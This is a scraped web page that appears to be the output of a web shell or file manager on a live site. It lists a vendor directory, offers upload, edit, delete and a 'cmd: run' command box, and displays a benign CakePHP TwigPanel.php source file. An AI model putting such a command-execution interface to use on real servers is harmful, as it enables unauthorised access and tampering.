/
var
/
www
/
vhosts
/
ihelp.ro
/
httpdocs
/
vendor
/
cakephp
/
twig-view
/
src
/
Panel
/
/var/www/vhosts/ihelp.ro/httpdocs/vendor/cakephp/twig-view/src/Panel
mkdir
upload
Name
Size
Mode
Actions
TwigPanel.php
1480
0644
edit
dl
rm
Edit:
/var/www/vhosts/ihelp.ro/httpdocs/vendor/cakephp/twig-view/src/Panel/TwigPanel.php
(1480B)
<?php declare(strict_types=1); /** * CakePHP(tm) : Rapid Development Framework (https://cakephp.org) * Copyright (c) Cake Software Foundation, Inc. (https://cakefoundation.org) * Copyright (c) 2014 Cees-Jan Kiewiet * * Licensed under The MIT License * For full copyright and license information, please see the LICENSE.txt * Redistributions of files must retain the above copyright notice * * @copyright Copyright (c) Cake Software Foundation, Inc. (https://cakefoundation.org) * @link https://cakephp.org CakePHP(tm) Project * @since 1.0.0 * @license https://opensource.org/licenses/mit-license.php MIT License */ namespace Cake\TwigView\Panel; use Cake\TwigView\Filesystem\TreeScanner; use DebugKit\DebugPanel; class TwigPanel extends DebugPanel { /** * @var string[] */ protected static $extensions = []; /** * Plugin name. * * @var string */ public $plugin = 'Cake/TwigView'; /** * Get the data for the twig panel. * * @return array */ public function data(): array { return [ 'templates' => TreeScanner::all(static::$extensions), ]; } /** * Sets the template file extensions to search. * * @param string[] $extensions Template extensions to search * @return void */ public static function setExtensions(array $extensions): void { static::$extensions = $extensions; } }
Save
cmd:
run